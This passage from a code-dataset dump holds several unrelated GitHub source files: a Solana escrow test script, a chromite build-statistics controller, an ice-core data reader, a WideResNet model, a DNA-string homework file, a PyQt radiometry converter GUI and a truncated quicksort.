Pubkey.from_bytes(\n account_info.initializer_token_to_receive_account_pubkey\n )\n initlizer_wallet = Pubkey.from_bytes(account_info.initializer_pubkey)\n temp_token_account = Pubkey.from_bytes(account_info.temp_token_account_pubkey)\n pda, _ = PublicKey.find_program_address(\n [bytes(\"escrow\", encoding=\"utf8\")], program_id\n )\n take_trade_ix = TransactionInstruction(\n keys=[\n AccountMeta(taker_wallet, is_signer=True, is_writable=False),\n AccountMeta(taker_y_account, is_signer=False, is_writable=True),\n AccountMeta(taker_x_account, is_signer=False, is_writable=True),\n AccountMeta(\n PublicKey(temp_token_account), is_signer=False, is_writable=True\n ),\n AccountMeta(PublicKey(initlizer_wallet), is_signer=False, is_writable=True),\n AccountMeta(\n PublicKey(initlizer_y_account), is_signer=False, is_writable=True\n ),\n AccountMeta(escrow_account, 
is_signer=False, is_writable=True),\n AccountMeta(TOKEN_PROGRAM_ID, is_signer=False, is_writable=False),\n AccountMeta(pda, is_signer=False, is_writable=False),\n ],\n program_id=program_id,\n data=construct_payload(EscrowInstructions.EXCHANGE, expected_amount),\n )\n taker_keypair = Keypair.from_secret_key(\n bytes(keys[\"taker_wallet_secret\"].encode(\"latin-1\"))\n )\n tx = Transaction().add(take_trade_ix)\n\n transaction = await client.send_transaction(tx, taker_keypair)\n await client.confirm_transaction(transaction.value)\n data= [[(await client.get_token_account_balance(initlizer_x_account)).value.amount,\n (await client.get_token_account_balance(PublicKey(initlizer_y_account))).value.amount,\n (await client.get_token_account_balance(taker_x_account)).value.amount,\n (await client.get_token_account_balance(taker_y_account)).value.amount]]\n\n print(tabulate(data,headers=[\"initlizer x account\", \"initlizer y account\", \"taker x account\", \"taker y account\"]))\n print(\"✨Trade successfully executed. All temporary accounts closed✨\\n\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(take_trade())\n","repo_name":"adam1231231/escrow-program-solana","sub_path":"testing-scripts/escrow_taker_transaction.py","file_name":"escrow_taker_transaction.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12533757785","text":"from __future__ import print_function\n\nimport collections\n\nfrom django.db import models\nfrom django.db.models import query\n\nfrom build_annotations import models as ba_models\n\n# We need to fake out some system modules before importing chromite modules.\nfrom cq_stats import fake_system_modules # pylint: disable=unused-import\nfrom chromite.lib import clactions\n\n\nclass BuildRow(collections.MutableMapping):\n \"\"\"A database \"view\" that collects all relevant stats about a build.\"\"\"\n\n def __init__(self, build_entry, build_stage_entries,\n cl_action_entries, failure_entries, annotations,\n costly_annotations_qs):\n \"\"\"Initialize a BuildRow.\n\n Do not use QuerySets as arguments. All query sets must have been evaluated\n before creating this object. 
All data manipulation within this object is\n pure python.\n\n All non-trivial computation on this object should be lazy: Defer it to\n property getters.\n \"\"\"\n assert not isinstance(build_entry, query.QuerySet)\n assert not isinstance(build_stage_entries, query.QuerySet)\n assert not isinstance(cl_action_entries, query.QuerySet)\n assert not isinstance(failure_entries, query.QuerySet)\n\n self._data = {}\n\n self.build_entry = build_entry\n self._build_stage_entries = build_stage_entries\n self._cl_action_entries = cl_action_entries\n self._failure_entries = failure_entries\n\n # The readonly data is accessible from this object as dict entries.\n self['id'] = self.build_entry.id\n self['build_number'] = self.build_entry.build_number\n self['status'] = self.build_entry.status\n self['summary'] = self.build_entry.summary\n self['start_time'] = self.build_entry.start_time\n if (self.build_entry.finish_time is not None and\n self['start_time'] is not None):\n self['run_time'] = self.build_entry.finish_time - self['start_time']\n else:\n self['run_time'] = None\n if self['start_time'] is not None:\n self['weekday'] = (self['start_time'].date().weekday() != 6)\n else:\n self['weekday'] = None\n self['chromeos_version'] = self.build_entry.full_version\n self['chrome_version'] = self.build_entry.chrome_version\n self['waterfall'] = self.build_entry.waterfall\n self['builder_name'] = self.build_entry.builder_name\n\n failed_stages = [x.name for x in build_stage_entries if\n x.status == x.FAIL]\n self['failed_stages'] = ', '.join(failed_stages)\n self['picked_up_count'] = self._CountCLActions(\n ba_models.ClActionTable.PICKED_UP)\n self['submitted_count'] = self._CountCLActions(\n ba_models.ClActionTable.SUBMITTED)\n self['kicked_out_count'] = self._CountCLActions(\n ba_models.ClActionTable.KICKED_OUT)\n self['annotation_summary'] = self._SummaryAnnotations(annotations)\n self._costly_annotations_qs = costly_annotations_qs\n\n def GetAnnotationsQS(self):\n \"\"\"Return the queryset backing annotations.\n\n Executing this queryset is costly because there is no way to optimize the\n query execution.\n Since this is a related_set queryset, that was further filtered, each item\n in the queryset causes a db hit.\n \"\"\"\n return self._costly_annotations_qs\n\n def __getitem__(self, *args, **kwargs):\n return self._data.__getitem__(*args, **kwargs)\n\n def __iter__(self, *args, **kwargs):\n return self._data.__iter__(*args, **kwargs)\n\n def __len__(self, *args, **kwargs):\n return self._data.__len__(*args, **kwargs)\n\n def __setitem__(self, *args, **kwargs):\n return self._data.__setitem__(*args, **kwargs)\n\n def __delitem__(self, *args, **kwargs):\n return self._data.__delitem__(*args, **kwargs)\n\n def _CountCLActions(self, cl_action):\n actions = [x for x in self._cl_action_entries if x.action == cl_action]\n return len(actions)\n\n def _SummaryAnnotations(self, annotations):\n if not annotations:\n return ''\n\n result = '%d annotations: ' % len(annotations)\n summaries = []\n for annotation in annotations:\n summary = annotation.failure_category\n failure_message = annotation.failure_message\n blame_url = annotation.blame_url\n if failure_message:\n summary += '(%s)' % failure_message[:30]\n elif blame_url:\n summary += '(%s)' % blame_url[:30]\n summaries.append(summary)\n\n result += '; '.join(summaries)\n return result\n\n\nclass BuildRowController(object):\n \"\"\"The 'controller' class that collates stats for builds.\n\n More details here.\n Unit-test this class please.\n \"\"\"\n\n 
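# Default query window: the Get* methods below fetch this many recent builds\n # unless the caller overrides num_builds.\n 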
DEFAULT_NUM_BUILDS = 30\n\n def __init__(self):\n self._latest_build_id = 0\n self._build_rows_map = {}\n\n\n def GetStructuredBuilds(self, latest_build_id=None,\n num_builds=DEFAULT_NUM_BUILDS, extra_filter_q=None):\n \"\"\"The primary method to obtain stats for builds\n\n Args:\n latest_build_id: build_id of the latest build to query.\n num_builds: Number of build to query.\n extra_filter_q: An optional Q object to filter builds. Use GetQ* methods\n provided in this class to form the filter.\n\n Returns:\n A list of BuildRow entries for the queried builds.\n \"\"\"\n # If we're not given any latest_build_id, we fetch the latest builds\n if latest_build_id is not None:\n build_qs = ba_models.BuildTable.objects.filter(id__lte=latest_build_id)\n else:\n build_qs = ba_models.BuildTable.objects.all()\n\n if extra_filter_q is not None:\n build_qs = build_qs.filter(extra_filter_q)\n build_qs = build_qs.order_by('-id')\n build_qs = build_qs[:num_builds]\n\n # Critical for performance: Prefetch all the join relations we'll need.\n build_qs = build_qs.prefetch_related('buildstagetable_set')\n build_qs = build_qs.prefetch_related('clactiontable_set')\n build_qs = build_qs.prefetch_related(\n 'buildstagetable_set__failuretable_set')\n build_qs = build_qs.prefetch_related('annotationstable_set')\n\n # Now hit the database.\n build_entries = [x for x in build_qs]\n\n self._build_rows_map = {}\n build_rows = []\n for build_entry in build_entries:\n build_stage_entries = [x for x in build_entry.buildstagetable_set.all()]\n cl_action_entries = [x for x in build_entry.clactiontable_set.all()]\n failure_entries = []\n for entry in build_stage_entries:\n failure_entries += [x for x in entry.failuretable_set.all()]\n # Filter in python, filter'ing the queryset changes the queryset, and we\n # end up hitting the database again.\n annotations = [a for a in build_entry.annotationstable_set.all() if\n a.deleted == False]\n costly_annotations_qs = build_entry.annotationstable_set.filter(\n deleted=False)\n\n build_row = BuildRow(build_entry, build_stage_entries, cl_action_entries,\n failure_entries, annotations, costly_annotations_qs)\n\n self._build_rows_map[build_entry.id] = build_row\n build_rows.append(build_row)\n\n if build_entries:\n self._latest_build_id = build_entries[0].id\n\n return build_rows\n\n def GetHandlingTimeHistogram(self, latest_build_id=None,\n num_builds=DEFAULT_NUM_BUILDS,\n extra_filter_q=None):\n \"\"\"Get CL handling time histogram.\"\"\"\n # If we're not given any latest_build_id, we fetch the latest builds\n if latest_build_id is not None:\n build_qs = ba_models.BuildTable.objects.filter(id__lte=latest_build_id)\n else:\n build_qs = ba_models.BuildTable.objects.all()\n\n if extra_filter_q is not None:\n build_qs = build_qs.filter(extra_filter_q)\n build_qs = build_qs.order_by('-id')\n build_qs = build_qs[:num_builds]\n\n # Hit the database.\n build_entries = list(build_qs)\n claction_qs = ba_models.ClActionTable.objects.select_related('build_id')\n claction_qs = claction_qs.filter(\n build_id__in=set(b.id for b in build_entries))\n # Hit the database.\n claction_entries = [c for c in claction_qs]\n\n claction_history = clactions.CLActionHistory(\n self._JoinBuildTableClActionTable(build_entries, claction_entries))\n # Convert times seconds -> minutes.\n return {k: v / 60.0\n for k, v in claction_history.GetPatchHandlingTimes().iteritems()}\n\n def _JoinBuildTableClActionTable(self, build_entries, claction_entries):\n \"\"\"Perform the join operation in python.\n\n Args:\n 
build_entries: A list of buildTable entries.\n claction_entries: A list of ClActionTable entries.\n\n Returns:\n A list of claction.CLAction objects created by joining the list of builds\n and list of claction entries.\n \"\"\"\n claction_entries_by_build_id = {}\n for entry in claction_entries:\n entries = claction_entries_by_build_id.setdefault(entry.build_id.id, [])\n entries.append(entry)\n\n claction_list = []\n for build_entry in build_entries:\n for claction_entry in claction_entries_by_build_id.get(build_entry.id,\n []):\n claction_list.append(clactions.CLAction(\n id=claction_entry.id,\n build_id=build_entry.id,\n action=claction_entry.action,\n reason=claction_entry.reason,\n build_config=build_entry.build_config,\n change_number=claction_entry.change_number,\n patch_number=claction_entry.patch_number,\n change_source=claction_entry.change_source,\n timestamp=claction_entry.timestamp,\n buildbucket_id=None,\n status=None))\n\n return claction_list\n\n ############################################################################\n # GetQ* methods are intended to be used in nifty search expressions to search\n # for builds.\n @classmethod\n def GetQNoAnnotations(cls):\n \"\"\"Return a Q for builds with no annotations yet.\"\"\"\n return models.Q(annotationstable__isnull=True)\n\n @classmethod\n def GetQRestrictToBuildConfig(cls, build_config):\n \"\"\"Return a Q for builds with the given build_config.\"\"\"\n return models.Q(build_config=build_config)\n\n @property\n def num_builds(self):\n return len(self._build_rows_map)\n\n @property\n def latest_build_id(self):\n return self._latest_build_id\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/appengine/cq_stats/build_annotations/build_row_controller.py","file_name":"build_row_controller.py","file_ext":"py","file_size_in_byte":10193,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
+{"seq_id":"7129445566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 17 15:35:20 2023\n\n@author: jespe\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom Cubic_smooth import smooth_data\n\ndef read_data_d18O(path_data):\n df = pd.read_excel(path_data)\n depth_data = np.flipud(np.array(df[df.columns[0]]))\n d18O_data = np.flipud(np.array(df[df.columns[6]])) / 1000.\n ice_age_data = np.flipud(np.array(df[df.columns[7]])) * (-1)\n return depth_data, d18O_data, ice_age_data\n\n\ndef find_start_end_ind(ice_age_data, start_year, end_year):\n t_start_ind = np.min(np.where(ice_age_data >= start_year))\n t_end_ind = np.max(np.where(ice_age_data <= end_year))\n return t_start_ind, t_end_ind\n\n\n\ndef get_interval_data(depth_data, d18O_data, ice_age_data, start_year, end_year, dt, cop):\n t_start_ind, t_end_ind = find_start_end_ind(ice_age_data, start_year, end_year)\n depth_data_interval = depth_data[t_start_ind: t_end_ind]\n d18O_interval = d18O_data[t_start_ind: t_end_ind]\n ice_age_interval = ice_age_data[t_start_ind: t_end_ind]\n time_grid = new_time_grid(start_year, end_year, dt)\n d18O_smooth, time_grid = smooth_data(\n cop, d18O_interval, ice_age_interval, time_grid)\n return depth_data_interval, d18O_interval, ice_age_interval, d18O_smooth, time_grid\n\n\ndef get_interval_data_NoTimeGrid(depth_data, d18O_data, ice_age_data, start_year, end_year):\n t_start_ind, t_end_ind = find_start_end_ind(ice_age_data, start_year, end_year)\n depth_data_interval = depth_data[t_start_ind: t_end_ind]\n d18O_interval = d18O_data[t_start_ind: t_end_ind]\n ice_age_interval = 
ice_age_data[t_start_ind: t_end_ind]\n\n return depth_data_interval, d18O_interval, ice_age_interval\n\n\ndef new_time_grid(T_init, T_final, dt):\n time_grid = np.arange(T_init, T_final, dt)\n return time_grid\n","repo_name":"Arcaru24601/CommunityFirnThesis","sub_path":"Python/Optimization/d18O_read.py","file_name":"d18O_read.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28188755986","text":"\"\"\"\nWideResnet architecture adapted from https://github.com/meliketoy/wide-resnet.pytorch\n\"\"\"\n\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nimport numpy as np\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"\n Convolution with 3x3 kernels.\n \"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=True)\n\n\ndef conv_init(m):\n \"\"\"\n Initializing convolution layers.\n \"\"\"\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n init.xavier_uniform(m.weight, gain=np.sqrt(2))\n init.constant(m.bias, 0)\n elif classname.find('BatchNorm') != -1:\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n\n\nclass Identity(nn.Module):\n \"\"\"\n Identity norm as a stand in for no BN.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n def forward(self, x):\n \"\"\"\n Forward pass of model.\n \"\"\"\n return x\n\n\nclass wide_basic(nn.Module):\n \"\"\"\n One block in the Wide resnet.\n \"\"\"\n def __init__(self, in_planes, planes, dropout_rate, stride=1, norm=None, leak=.2, first=False):\n super(wide_basic, self).__init__()\n self.lrelu = nn.LeakyReLU(leak)\n self.bn1 = get_norm(in_planes, norm)\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, padding=1, bias=True)\n self.dropout = Identity() if dropout_rate == 0.0 else nn.Dropout(p=dropout_rate)\n self.bn2 = get_norm(planes, norm)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=True)\n\n self.first = first\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride, bias=True),\n )\n\n def forward(self, x):\n \"\"\"\n Forward pass of block.\n \"\"\"\n if self.first: # if it's the first block, don't apply the first batchnorm to the data\n out = self.dropout(self.conv1(self.lrelu(x)))\n else:\n out = self.dropout(self.conv1(self.lrelu(self.bn1(x))))\n out = self.conv2(self.lrelu(self.bn2(out)))\n out += self.shortcut(x)\n\n return out\n\n\ndef get_norm(n_filters, norm):\n \"\"\"\n Get batchnorm or other.\n \"\"\"\n if norm is None:\n return Identity()\n elif norm == \"batch\":\n return nn.BatchNorm2d(n_filters, momentum=0.9)\n elif norm == \"instance\":\n return nn.InstanceNorm2d(n_filters, affine=True)\n elif norm == \"layer\":\n return nn.GroupNorm(1, n_filters)\n elif norm == \"group\":\n return nn.GroupNorm(32, n_filters)\n\n\nclass Wide_ResNet(nn.Module):\n \"\"\"\n Wide resnet model.\n \"\"\"\n def __init__(self, depth, widen_factor, num_classes=10, input_channels=3,\n sum_pool=False, norm=None, leak=.2, dropout_rate=0.0):\n super(Wide_ResNet, self).__init__()\n self.leak = leak\n self.in_planes = 16\n self.sum_pool = sum_pool\n self.norm = norm\n self.lrelu = nn.LeakyReLU(leak)\n\n assert ((depth-4) % 6 == 0), 'Wide-resnet depth should be 6n+4'\n n = (depth-4)//6\n k = widen_factor\n\n print('| Wide-Resnet %dx%d' % (depth, k))\n nStages = [16, 16*k, 
32*k, 64*k]\n\n self.conv1 = conv3x3(input_channels, nStages[0])\n self.layer1 = self._wide_layer(wide_basic, nStages[1], n, dropout_rate, stride=1, first=True)\n self.layer2 = self._wide_layer(wide_basic, nStages[2], n, dropout_rate, stride=2)\n self.layer3 = self._wide_layer(wide_basic, nStages[3], n, dropout_rate, stride=2)\n self.bn1 = get_norm(nStages[3], self.norm)\n self.last_dim = nStages[3]\n self.linear = nn.Linear(nStages[3], num_classes)\n\n def _wide_layer(self, block, planes, num_blocks, dropout_rate, stride, first=False):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n\n for i, stride in enumerate(strides):\n if first and i == 0: # first block of first layer has no BN\n layers.append(block(self.in_planes, planes, dropout_rate, stride,\n norm=self.norm, first=True))\n else:\n layers.append(block(self.in_planes, planes, dropout_rate, stride,\n norm=self.norm))\n self.in_planes = planes\n\n return nn.Sequential(*layers)\n\n def forward(self, x, vx=None):\n \"\"\"\n Forward pass. TODO: purpose of vx?\n \"\"\"\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.lrelu(self.bn1(out))\n if self.sum_pool:\n out = out.view(out.size(0), out.size(1), -1).sum(2)\n else:\n out = F.avg_pool2d(out, 8)\n out = out.view(out.size(0), -1)\n return self.linear(out)\n","repo_name":"wgrathwohl/VERA","sub_path":"models/wideresnet.py","file_name":"wideresnet.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"52"}
+{"seq_id":"35108974761","text":"''' Program: HW7 - DNA\n Author: Tom Stutler\n Last Date Modified: 10/12/14\n\n The intent of this program is to define several functions using strings of DNA sequences in an attempt to better understand the use and modification of python strings.\n'''\ndef get_length(dna):\n \"\"\" (str) -> int\n\n Return the length of the DNA sequence dna.\n\n >>> get_length('ATCGAT')\n 6\n >>> get_length('ATCG')\n 4\n \"\"\"\n return len(dna)\n\n\ndef is_longer(dna1, dna2):\n \"\"\" (str, str) -> bool\n\n Return True if and only if DNA sequence dna1 is longer than DNA sequence\n dna2.\n\n >>> is_longer('ATCG', 'AT')\n True\n >>> is_longer('ATCG', 'ATCGGA')\n False\n \"\"\"\n if len(dna1) > len(dna2):\n return True\n else:\n return False\n\n\ndef count_nucleotides(dna, nucleotide):\n \"\"\" (str, str) -> int\n\n Return the number of occurrences of nucleotide in the DNA sequence dna.\n\n >>> count_nucleotides('ATCGGC', 'G')\n 2\n >>> count_nucleotides('ATCTA', 'G')\n 0\n \"\"\"\n if dna != '' and nucleotide != '':\n nucleotide_count = 0\n for index in dna:\n if index == nucleotide:\n nucleotide_count += 1\n return nucleotide_count\n else:\n print(\"Please enter a valid DNA sequence and nucleotide.\")\n\n\ndef contains_sequence(dna1, dna2):\n \"\"\" (str, str) -> bool\n\n Return True if and only if DNA sequence dna2 occurs in the DNA sequence\n dna1.\n\n >>> contains_sequence('ATCGGC', 'GG')\n True\n >>> contains_sequence('ATCGGC', 'GT')\n False\n \"\"\"\n if dna1 != '' and dna2 != '':\n if dna2 in dna1:\n return True\n else:\n return False\n else:\n print(\"Please enter valid DNA sequences.\")\n\n\ndef is_valid_sequence(dna):\n ''' (str) -> bool\n\n Return True if and only if the DNA sequence contains only 'A's, 'T's, 'C's,\n or 'G's and is not lower case.\n\n >>> is_valid_sequence('ATCGGC')\n True\n >>> is_valid_sequence('ATCGGF')\n False\n '''\n if dna != '':\n for index in dna:\n if index == 'A' or index == 'T' 
or index == 'C' or index == 'G':\n valid_sequence = True\n else:\n valid_sequence = False\n break\n return valid_sequence\n else:\n return False\n\n\ndef insert_sequence(dna1, dna2, index):\n ''' (str, str, int) -> str\n\n Return a new DNA sequence in which dna2 has been inserted into dna1\n at the specified index.\n\n >>> insert_sequence('CCGG', 'AT', 2)\n 'CCATGG'\n >>> insert_sequence('CCGG', 'AT', -1)\n 'CCGATG'\n '''\n new_sequence = dna1[:index] + dna2 + dna1[index:]\n return new_sequence\n\n\ndef get_complement(nucleotide):\n ''' (str) -> str\n\n Return the complement of the given nucleotide. A and T are complements and\n C and G are complements.\n\n >>> get_complement('A')\n 'T'\n >>> get_complement('G')\n 'C'\n '''\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'T':\n return 'A'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'\n else:\n print('Please enter a valid nucleotide.')\n\ndef get_complementary_sequence(dna1):\n ''' (str) -> str\n\n Return the complementary sequence to the DNA sequence provided.\n A and T are complements as well as C and G are complements.\n\n >>> get_complementary_sequence('ATCG')\n 'TAGC'\n >>> get_complementary_sequence('AAGG')\n 'TTCC'\n '''\n dna2 = ''\n if dna1 != '':\n for index in dna1:\n if index == 'A':\n dna2 += 'T'\n elif index == 'T':\n dna2 += 'A'\n elif index == 'C':\n dna2 += 'G'\n elif index == 'G':\n dna2 += 'C'\n else:\n return 'Please enter a valid DNA sequence.'\n break\n return dna2\n else:\n print('Please enter a valid DNA sequence.')\n","repo_name":"MadTofu22/MCTC_Python_Assignments","sub_path":"Assignments/HW7/a2TomStutler.py","file_name":"a2TomStutler.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"35315190073","text":"# Imports - standard modules\nimport sys\n\n# Import matplotlib and set it to use Qt5Agg for plotting\n# import matplotlib as mpl\n# mpl.use(\"Qt5Agg\")\n\n# Import pyqtSlot to connect sliders and DoubleSpinBox signals\nfrom PyQt5.QtCore import *\n\n# Import PyQt Widgets for PyQt5 version\nfrom PyQt5.QtWidgets import *\n\n# Import functions from scipy library for scientific simulation\nfrom scipy import pi, linspace, meshgrid, sin, exp\n\n# Import matplotlib backends\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FC\nfrom matplotlib.figure import Figure\n\n# Import pyplot from matplotlib\nfrom matplotlib import pyplot as plt\n\n# Define the class for the project\n\n\nclass MainApp(QMainWindow):\n def __init__(self):\n \"\"\" Constructor or the initializer \"\"\"\n QMainWindow.__init__(self)\n\n # Set some default attributes of the window\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setWindowTitle(\"Radiometry - Photometry Converter\")\n\n # Set some default values\n self.LumQuant = ['Energy', 'Flux', 'Emittance',\n 'Intensity', 'Luminance', 'Illuminance']\n self.RadUnits = [\"Joules (J)\", \"Watts (W)\",\n \"W/m^2\", \"W/Sr\", \"W/(m^2.Sr)\", \"W/m^2\"]\n self.PhotUnits = [\"Talbot (T)\", \"Lumens (lm)\",\n \"lm/m^2\", \"Candela (cd)\", \"cd/m^2\", \"lux\"]\n\n # define the main widget as self\n self.main_widget = QWidget(self)\n\n # Add the label widgets and sliders\n # Lighting Condition\n self.loCondition = QHBoxLayout()\n self.lblCondition = QLabel(\"Condition\", self)\n self.cmbCondition = QComboBox()\n self.cmbCondition.addItems([\"Photopic\", \"Scotopic\"])\n self.loCondition.addStretch()\n self.loCondition.addWidget(self.lblCondition)\n 
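# the stretches added on either end keep the label/combo pair centred in the row\n 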
self.loCondition.addSpacing(3)\n self.loCondition.addWidget(self.cmbCondition)\n self.loCondition.addStretch()\n\n # Wavelength\n self.loWavelength = QHBoxLayout()\n self.lblWavelength = QLabel(\"Wavelength (nm)\", self)\n self.edtWavelength = QLineEdit(self)\n self.edtWavelength.setMaxLength(3)\n self.edtWavelength.setText(\"555\")\n self.loWavelength.addStretch()\n self.loWavelength.addWidget(self.lblWavelength)\n self.loWavelength.addSpacing(3)\n self.loWavelength.addWidget(self.edtWavelength)\n self.loWavelength.addStretch()\n\n # Radiometric Quantities\n self.loRadQuantTemp = QHBoxLayout()\n self.loRadQuant = QVBoxLayout()\n self.lblRadQuant = QLabel(\"Radiometric Quantity\", self)\n self.cmbRadQuant = QComboBox()\n self.cmbRadQuant.addItems(\n [\"Energy\", \"Flux\", \"Emittance\", \"Intensity\", \"Radiance\", \"Irradiance\"])\n self.edtRadQuant = QLineEdit(self)\n self.edtRadQuant.setMaxLength(7)\n self.edtRadQuant.setText(\"1\")\n self.lblRadQUnit = QLabel(self.RadUnits[0], self)\n self.loRadQuantTemp.addWidget(self.cmbRadQuant)\n self.loRadQuantTemp.addSpacing(4)\n self.loRadQuantTemp.addWidget(self.edtRadQuant)\n self.loRadQuantTemp.addSpacing(4)\n self.loRadQuantTemp.addWidget(self.lblRadQUnit)\n self.loRadQuant.addStretch()\n self.loRadQuant.addWidget(self.lblRadQuant)\n self.loRadQuant.addSpacing(3)\n self.loRadQuant.addLayout(self.loRadQuantTemp)\n self.loRadQuant.addStretch()\n\n # Photometric Quantities\n self.loPhotQuantTemp = QHBoxLayout()\n self.loPhotQuant = QVBoxLayout()\n self.lblPhotQuant = QLabel(\"Photometric Quantity\", self)\n self.lblPhotQuantName = QLabel(self.LumQuant[0], self)\n self.edtPhotQuant = QLineEdit(self)\n self.edtPhotQuant.setMaxLength(7)\n self.edtPhotQuant.setText(\"683\")\n self.lblPhotQUnit = QLabel(self.PhotUnits[0], self)\n self.loPhotQuantTemp.addWidget(self.lblPhotQuantName)\n self.loPhotQuantTemp.addSpacing(4)\n self.loPhotQuantTemp.addWidget(self.edtPhotQuant)\n self.loPhotQuantTemp.addSpacing(4)\n self.loPhotQuantTemp.addWidget(self.lblPhotQUnit)\n self.loPhotQuant.addStretch()\n self.loPhotQuant.addWidget(self.lblPhotQuant)\n self.loPhotQuant.addSpacing(3)\n self.loPhotQuant.addLayout(self.loPhotQuantTemp)\n self.loPhotQuant.addStretch()\n\n # Layout of Radiometric and Photometric Quantities\n self.loTemp = QHBoxLayout()\n self.loTemp.addStretch()\n self.loTemp.addLayout(self.loRadQuant)\n self.loTemp.addSpacing(15)\n self.loTemp.addLayout(self.loPhotQuant)\n self.loTemp.addStretch()\n\n # Master Layout\n self.loMaster = QVBoxLayout(self.main_widget)\n self.loMaster.addLayout(self.loCondition)\n self.loMaster.addSpacing(3)\n self.loMaster.addLayout(self.loWavelength)\n self.loMaster.addSpacing(20)\n self.loMaster.addLayout(self.loTemp)\n\n # Set focus to the main widget\n self.main_widget.setFocus()\n self.setCentralWidget(self.main_widget)\n\n # Connect the slots to the signals\n self.cmbCondition.currentIndexChanged.connect(self.conditionChanged)\n self.cmbRadQuant.currentIndexChanged.connect(self.radQuantChanged)\n self.edtRadQuant.editingFinished.connect(self.radQuantValChanged)\n self.edtPhotQuant.editingFinished.connect(self.photQuantValChanged)\n self.edtWavelength.editingFinished.connect(self.wavelengthChanged)\n\n def conditionChanged(self):\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def radQuantChanged(self):\n indNum = self.cmbRadQuant.currentIndex()\n self.lblRadQUnit.setText(self.RadUnits[indNum])\n 
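# The LumQuant, RadUnits and PhotUnits lists are index-aligned, so the single combo-box index below selects the matching quantity name and units from every list.\n 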
self.lblPhotQuantName.setText(self.LumQuant[indNum])\n self.lblPhotQUnit.setText(self.PhotUnits[indNum])\n\n def radQuantValChanged(self):\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def photQuantValChanged(self):\n pVal = float(self.edtPhotQuant.text())\n condNum = self.cmbCondition.currentIndex()\n rVal = self.getVlInv(condNum)\n self.edtRadQuant.setText(str(rVal))\n\n def wavelengthChanged(self):\n wl = float(self.edtWavelength.text())\n if wl < 400:\n self.edtWavelength.setText(\"400\")\n if wl > 700:\n self.edtWavelength.setText(\"700\")\n condNum = self.cmbCondition.currentIndex()\n pVal = self.getVl(condNum)\n self.edtPhotQuant.setText(str(pVal))\n\n def getVl(self, i):\n wl = float(self.edtWavelength.text())\n rVal = float(self.edtRadQuant.text())\n # Photopic: Vl = 683 * exp(-285.4*((wl-555)/1000)^2) * rVal, wl in nm\n if i == 0:\n Vl = 683 * exp(-285.4 * ((wl - 555.0) / 1000)**2) * rVal\n # Scotopic: Vl = 1704 * exp(-321.9*((wl-507)/1000)^2) * rVal\n else:\n Vl = 1704 * exp(-321.9 * ((wl - 507.0) / 1000)**2) * rVal\n return Vl\n\n def getVlInv(self, i):\n wl = float(self.edtWavelength.text())\n pVal = float(self.edtPhotQuant.text())\n # Photopic: invert the forward conversion used in getVl\n if i == 0:\n Vl = pVal / (683 * exp(-285.4 * ((wl - 555.0) / 1000)**2))\n # Scotopic: invert the forward conversion used in getVl\n else:\n Vl = pVal / (1704 * exp(-321.9 * ((wl - 507.0) / 1000)**2))\n return Vl\n\n\n# Implement the main object\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n MyApp = MainApp()\n MyApp.show()\n app.exec()\n","repo_name":"xu-nuo-xu/Understanding_Optics_with_Python","sub_path":"programs/chapter4/Code_Photometry_Conversion_GUI.py","file_name":"Code_Photometry_Conversion_GUI.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"1883560806","text":"''' Quick sort\n\n1. Take one number from the list as the pivot\n2. Partition: move every number greater than the pivot to its right, and every number less than or equal to it to its left\n3. Repeat step 2 on the left and right partitions until each partition holds only one number\n\n\nTime complexity: best case NlogN, worst case N^2\n\n'''\n\ndef quick_sort(A,l,r):\n\tif l>=r-1:\n\t\treturn\n\thigh=l\n\tlow=r-1\n\tk=l\n\twhile high<low:\n\t\twhile low>high and A[low]>=A[high]:\n\t\t\tlow-=1\n\t\tif low>high:\n\t\t\tA[low],A[high]=A[high],A[low]\n\t\t\tk=low\n\t\twhile high<low and A[low]>=A[high]:\n\t\t\thigh+=1 \n\t\tif low>high:\n\t\t\tA[low],A[high]=A[high],A[low]\n\t\t\tk=high\n\tquick_sort(A,l,k)\n\tquick_sort(A,k+1,r)\n\n\nif __name__ == 